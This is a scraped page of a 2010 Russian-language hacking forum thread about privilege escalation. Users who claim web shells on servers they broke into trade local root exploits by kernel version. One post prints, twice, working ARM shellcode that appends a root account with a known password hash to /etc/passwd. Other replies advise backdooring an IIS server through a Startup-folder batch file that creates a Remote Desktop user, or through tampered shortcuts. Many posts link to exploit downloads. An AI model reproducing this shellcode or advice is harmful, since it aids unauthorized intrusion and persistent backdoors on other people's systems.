ANTICHAT
Страница 2 из 16 < 1 2 3 4 5 6 12 > Последняя »
Показывать 40 сообщений этой темы на одной странице

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   повышение прав [задай вопрос - получи ответ] (https://forum.antichat.xyz/showthread.php?t=235697)

valyka80 21.11.2010 01:30
Есть шелл,нужен сплоит (первый раз встречаю Macintosh HD)

Server.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT

2009; root:xnu-1228.15.4~1/RELEASE_I386 i386

ubi 24.11.2010 21:28
Linux vps1.pdm.su 2.6.26-2-openvz-amd64 #1 SMP Sun Jun 20 20:28:43 UTC 2010 x86_64

valyka80 25.11.2010 02:41
Цитата:
Сообщение от ubi
Linux vps1.pdm.su 2.6.26-2-openvz-amd64 #1 SMP Sun Jun 20 20:28:43 UTC 2010 x86_64
https://rdot.org/forum/archive/index.php/t-714.html

http://www.securityfocus.com/bid/36901/exploit

DCrypt 26.11.2010 10:13
Не могу нормально скомпилить. Даже на своей машине.

Цитата:
Сообщение от None
snip:~# gcc -o exp exp.c
exp.c: In function 'main':
exp.c:79: warning: incompatible implicit declaration of built-in function 'strlen'
Код:
#include
 
 
char SC[] =
            /* Thumb mode */
            "\x05\x50\x45\xe0"  /* sub  r5, r5, r5 */
            "\x01\x50\x8f\xe2"  /* add  r5, pc, #1 */
            "\x15\xff\x2f\xe1"  /* bx  r5 */
 
            /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
            "\x78\x46"          /* mov  r0, pc */
            "\x7C\x30"          /* adds r0, #124 */
            "\xff\x21"          /* movs r1, #255 */
            "\xff\x31"          /* adds r1, #255 */
            "\xff\x31"          /* adds r1, #255 */
            "\xff\x31"          /* adds r1, #255 */
            "\x45\x31"          /* adds r1, #69 */
            "\xdc\x22"          /* movs r2, #220 */
            "\xc8\x32"          /* adds r2, #200 */
            "\x05\x27"          /* movs r7, #5 */
            "\x01\xdf"          /* svc  1 */
 
            /* r8 = fd */
            "\x80\x46"          /* mov  r8, r0 */
 
            /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
            "\x41\x46"          /* mov  r1, r8 */
            "\x08\x1c"          /* adds r0, r1, #0 */
            "\x79\x46"          /* mov  r1, pc */
            "\x18\x31"          /* adds r1, #24 */
            "\xc0\x46"          /* nop (mov r8, r8) */
            "\x48\x22"          /* movs r2, #72 */
            "\x04\x27"          /* movs r7, #4 */
            "\x01\xdf"          /* svc  1 */
 
            /* close(fd) */
            "\x41\x46"          /* mov  r1, r8 */
            "\x08\x1c"          /* adds r0, r1, #0 */
            "\x06\x27"          /* movs r7, #6 */
            "\x01\xdf"          /* svc  1 */
 
            /* exit(0) */
            "\x1a\x49"          /* subs r1, r1, r1 */
            "\x08\x1c"          /* adds r0, r1, #0 */
            "\x01\x27"          /* movs r7, #1 */
            "\x01\xdf"          /* svc  1 */
 
            /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
            "\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
            "\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
            "\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
            "\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
            "\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
            "\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
            "\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
            "\x68\x0a"
 
            /* /etc/passwd */
            "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
 
 
int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}

Doom123 26.11.2010 14:25
Попробуй добавить ещё

#include

valyka80 27.11.2010 01:01
Цитата:
Сообщение от DCrypt
Не могу нормально скомпилить. Даже на своей машине.
Код:
#include
 
 
char SC[] =
            /* Thumb mode */
            "\x05\x50\x45\xe0"  /* sub  r5, r5, r5 */
            "\x01\x50\x8f\xe2"  /* add  r5, pc, #1 */
            "\x15\xff\x2f\xe1"  /* bx  r5 */
 
            /* open("/etc/passwd", O_WRONLY|O_CREAT|O_APPEND, 0644) = fd */
            "\x78\x46"          /* mov  r0, pc */
            "\x7C\x30"          /* adds r0, #124 */
            "\xff\x21"          /* movs r1, #255 */
            "\xff\x31"          /* adds r1, #255 */
            "\xff\x31"          /* adds r1, #255 */
            "\xff\x31"          /* adds r1, #255 */
            "\x45\x31"          /* adds r1, #69 */
            "\xdc\x22"          /* movs r2, #220 */
            "\xc8\x32"          /* adds r2, #200 */
            "\x05\x27"          /* movs r7, #5 */
            "\x01\xdf"          /* svc  1 */
 
            /* r8 = fd */
            "\x80\x46"          /* mov  r8, r0 */
 
            /* write(fd, "shell-storm:$1$KQYl/yru$PMt02zUTW"..., 72) */
            "\x41\x46"          /* mov  r1, r8 */
            "\x08\x1c"          /* adds r0, r1, #0 */
            "\x79\x46"          /* mov  r1, pc */
            "\x18\x31"          /* adds r1, #24 */
            "\xc0\x46"          /* nop (mov r8, r8) */
            "\x48\x22"          /* movs r2, #72 */
            "\x04\x27"          /* movs r7, #4 */
            "\x01\xdf"          /* svc  1 */
 
            /* close(fd) */
            "\x41\x46"          /* mov  r1, r8 */
            "\x08\x1c"          /* adds r0, r1, #0 */
            "\x06\x27"          /* movs r7, #6 */
            "\x01\xdf"          /* svc  1 */
 
            /* exit(0) */
            "\x1a\x49"          /* subs r1, r1, r1 */
            "\x08\x1c"          /* adds r0, r1, #0 */
            "\x01\x27"          /* movs r7, #1 */
            "\x01\xdf"          /* svc  1 */
 
            /* shell-storm:$1$KQYl/yru$PMt02zUTWmMvPWcU4oQLs/:0:0:root:/root:/bin/bash\n */
            "\x73\x68\x65\x6c\x6c\x2d\x73\x74\x6f\x72"
            "\x6d\x3a\x24\x31\x24\x4b\x51\x59\x6c\x2f"
            "\x79\x72\x75\x24\x50\x4d\x74\x30\x32\x7a"
            "\x55\x54\x57\x6d\x4d\x76\x50\x57\x63\x55"
            "\x34\x6f\x51\x4c\x73\x2f\x3a\x30\x3a\x30"
            "\x3a\x72\x6f\x6f\x74\x3a\x2f\x72\x6f\x6f"
            "\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73"
            "\x68\x0a"
 
            /* /etc/passwd */
            "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64";
 
 
int main(void)
{
        fprintf(stdout,"Length: %d\n",strlen(SC));
        (*(void(*)()) SC)();
return 0;
}
У меня без проблем (2.6.17-gentoo-r8)

попробуй так:

gcc -o file file.c -lpthread

скомпилил

http://depositfiles.com/files/2sebpiiyg

попугай 29.11.2010 07:03
Залил шелл на Win-сервер. К несчастью, там IIS, поэтому права обрезаны по самые уши. Есть Remote Deskop там, но паролей я не знаю. Могу создавать файлы в некоторых папках, например, C:\Documents and Settings\All Users\. Думаю, залить трой или еще что-нибудь, вдруг админ или пользователь запустит его Что есть из пабликового?

z0mbyak 29.11.2010 12:54
Если есть вариант залить в папку с автозагрузкой (по умолчанию C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк а) батник с созданием пользователя удаленного стола, то так и делай

Так же можешь подредактировать ярлыки программ (вставив запуск своего файла) если нет, то хоть версию iis скажи...

#Wolf# 01.12.2010 17:49
ищу под 2.6.18-194

Karantin 01.12.2010 17:55
Цитата:
Сообщение от попугай
Залил шелл на Win-сервер. К несчастью, там IIS, поэтому права обрезаны по самые уши. Есть Remote Deskop там, но паролей я не знаю. Могу создавать файлы в некоторых папках, например, C:\Documents and Settings\All Users\. Думаю, залить трой или еще что-нибудь, вдруг админ или пользователь запустит его
Что есть из пабликового?
http://www.exploit-db.com/exploits/15609/

valyka80 01.12.2010 18:11
Цитата:
Сообщение от #Wolf#
ищу под
2.6.18-194
Попробуй этот

http://depositfiles.com/files/gw7ce1mnu

HBWS 01.12.2010 22:23
Цитата:
Сообщение от z0mbyak
Если есть вариант залить в папку с автозагрузкой (по умолчанию C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк а) батник с созданием пользователя удаленного стола, то так и делай
Не плохая идея кстати, только не в C:\Documents and Settings\All Users\Главное меню\Программы\Автозагрузк а, а в

C:\Documents and Settings\Admin\Главное меню\Программы\Автозагрузк а, ну или какой там юзер с админ правами, так папка и будет называться (посмотри командой net user). Ну это подойдет только если сервак ребутают вообще.

#Wolf# 02.12.2010 04:39
Цитата:
Сообщение от #Wolf#
ищу под
2.6.18-194
Цитата:
Сообщение от valyka80
Попробуй этот
http://depositfiles.com/files/gw7ce1mnu
" if author else f"
Цитата:
#Wolf# said:
ищу под
2.6.18-194
Цитата:
Сообщение от valyka80
Попробуй этот
http://depositfiles.com/files/gw7ce1mnu
Не компилится. Кто-нибудь может поправить?

Перезалил.

z0mbyak 02.12.2010 10:13
Цитата:
Сообщение от None
Сообщение от #Wolf#
ищу под 2.6.18-194
Цитата:
Сообщение от valyka80
Попробуй этот
http://depositfiles.com/files/gw7ce1mnu
Не компилится. Кто-нибудь может поправить?
Перезалил.
Попробуй слоитпак enlightenment там под эту ветку кажись было...

http://grsecurity.net/~spender/enlightenment.tgz

GIG 02.12.2010 23:11
При комплиировании:

Код:
sh-3.2$ gcc -o file 1.c
In file included from 1.c:20:
/usr/include/linux/atm.h:210: error: expected specifier qualifier-list before 'uint32_t'
Uname a :

Код:
Linux 2.6.18-128.7.1.el5 #1 SMP Wed Aug 19 04:00:44 EDT 2009 i686 athlon i386 GNU/Linux
Эксплоит :

http://www.exploit-db.com/exploits/10613/

подскажите в чем проблема.

.:[melkiy]:. 03.12.2010 00:27
Код:
$ uname -a
Linux ***.com 2.6.18-028stab070.5 #1 SMP Fri Sep 17 15:37:23 MSD 2010 i686 i686 i386 GNU/Linux
есть что?

valyka80 03.12.2010 01:02
GIG

ты напиши подробно какая и в какой строке ошибка

(там может путь не катит)

GIG 03.12.2010 01:07
Цитата:
Сообщение от valyka80
GIG
ты напиши подробно какая и в какой строке ошибка
(там может путь не катит)
а то что я написал выше , это что по твоему?

valyka80 04.12.2010 02:30
Цитата:
Сообщение от GIG
а то что я написал выше , это что по твоему?
sorry я хотел бы узнать подробнее ошибку

там сто пудов путь исправить надо

z0mbyak 05.12.2010 23:38
Linux server01 2.6.25.9 #1 Thu Jun 26 18:54:56 CEST 2008 i686

Не подскажите сплоит?-)

P.S. из enlightenment не подошли...

valyka80 06.12.2010 00:51
Цитата:
Сообщение от z0mbyak
Linux server01 2.6.25.9 #1 Thu Jun 26 18:54:56 CEST 2008 i686
Не подскажите сплоит?-)
P.S. из enlightenment не подошли...
http://www.securityfocus.com/bid/36901/exploit

Bramin 06.12.2010 13:59
Windows NT PS30 5.2 build 3790 (Windows Server 2003 Web Edition Service Pack 2)

есть ли сплоит под это?

rooopster 06.12.2010 17:59
Подскажите, пожалуйста, что-то под

OS version: Linux version 2.6.25-NX.18-styx (root@styx) (gcc version 4.1.1 (Gentoo 4.1.1-r1)) #1 SMP Thu Nov 5 04:17:45 MSK 2009

.:[melkiy]:. 06.12.2010 20:46
Код:
$ uname -a
FreeBSD **** 6.3-PRERELEASE FreeBSD 6.3-PRERELEASE #1: Thu Dec 27 17:38:41 MSK 2007    root@***:/usr/src/sys/i386/compile/KOT  i386

---

$ uname -a
FreeBSD **** 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 12:11:16 UTC 2008    root@***:/usr/obj/usr/src/sys/SMP  i386
имеется что-нибудь?

valyka80 06.12.2010 21:58
Цитата:
Сообщение от .:[melkiy
:."]
.:[melkiy]:. said:
Код:
$ uname -a
FreeBSD **** 6.3-PRERELEASE FreeBSD 6.3-PRERELEASE #1: Thu Dec 27 17:38:41 MSK 2007    root@***:/usr/src/sys/i386/compile/KOT  i386

---

$ uname -a
FreeBSD **** 6.4-RELEASE FreeBSD 6.4-RELEASE #0: Wed Nov 26 12:11:16 UTC 2008    root@***:/usr/obj/usr/src/sys/SMP  i386
имеется что-нибудь?
http://www.frasunek.com/pipe.txt

или

http://www.frasunek.com/devfs.txt

#Wolf# 07.12.2010 13:55
Цитата:
Сообщение от z0mbyak
#2.6.18-194
Попробуй слоитпак enlightenment там под эту ветку кажись было...
http://grsecurity.net/~spender/enlightenment.tgz
не пошло

Sidarovich1975 07.12.2010 15:41
Linux 2.6.18-164.11.1.el5.centos.plusPAE #1 SMP Wed Jan 20 19:33:21 EST 2010 i686

Блин, очень надо

rooopster 08.12.2010 15:19
Привет, есть такой сервер:

$ uname -a

FreeBSD 4.10-RELEASE FreeBSD 4.10-RELEASE #0: Mon Apr 2005

Но, на нем хоть и есть gcc, при любом обращении выдает "The: not found". Есть также сс, но для него нету либ, то есть несколько сплоитов, которые я нашел в инете, не компилятся, жалуясь на отсутствие stdio.h и прочего. Пробовал скомпилить на другом компе, но в одном случае ругнулось варнингами и не сработало на жертве, в другом вообще не скомпилилось (vvfreebsd.c). Что можно сделать?

Кстати, поиск по stdio.h ничего не дал, так что их либо нету, либо не видно моему юзеру.

valyka80 08.12.2010 21:42
Вот скомпилил на freebcd --vvfreebsd.c--

http://depositfiles.com/files/tdbriwq3s

Acetoacidophilum 09.12.2010 14:12
Спасиб.

Acetoacidophilum 09.12.2010 14:13
Спасиб.

padlina2

http://www.sendspace.com/file/8kbnte

SEWERN 10.12.2010 17:56
Есть что-то 2.6.18-028stab067.4-PAE #1 SMP Thu Jan 14 22:09:19 MSK 2010 i686 i686 i386 GNU/Linux ?

valyka80 10.12.2010 22:36
Цитата:
Сообщение от SEWERN
Есть что-то 2.6.18-028stab067.4-PAE #1 SMP Thu Jan 14 22:09:19 MSK 2010 i686 i686 i386 GNU/Linux ?
http://www.feelcomz.com/?p=article&c=12

может здесь че найдешь

SEWERN 11.12.2010 00:37
Цитата:
Сообщение от valyka80
http://www.feelcomz.com/?p=article&c=12
может здесь че найдешь
смотрел - нету(

valyka80 11.12.2010 15:26
Цитата:
Сообщение от SEWERN
смотрел - нету(
У меня есть вот эти но они старенькие попробуй:

http://depositfiles.com/files/0k2l24y1n

pinch 12.12.2010 16:43
что-нибудь есть под это Windows NT 5.2 build 3790

valyka80 15.12.2010 23:42
Не могу сплоит поставить пишет ошибку

/bin/sh floaning point exception./exploit

что это может быть

z0mbyak 19.12.2010 19:35
Приветствую, помогите найти exploit под FreeBSD 6.2-RELEASE #0: Fri Jan 12 11:05:30 UTC 2007, вроде старая, а найти не могу:-(

valyka80 19.12.2010 22:08
Цитата:
Сообщение от z0mbyak
Приветствую, помогите найти exploit под FreeBSD 6.2-RELEASE #0: Fri Jan 12 11:05:30 UTC 2007, вроде старая, а найти не могу:-(
padlina не катит?

feebsd 7.01 катит

z0mbyak 19.12.2010 23:47
Цитата:
Сообщение от None
padlina не катит?
feebsd 7.01 катит
Жаль, но не катит:-(


Время: 17:23
Страница 2 из 16 < 1 2 3 4 5 6 12 > Последняя »
Показывать 40 сообщений этой темы на одной странице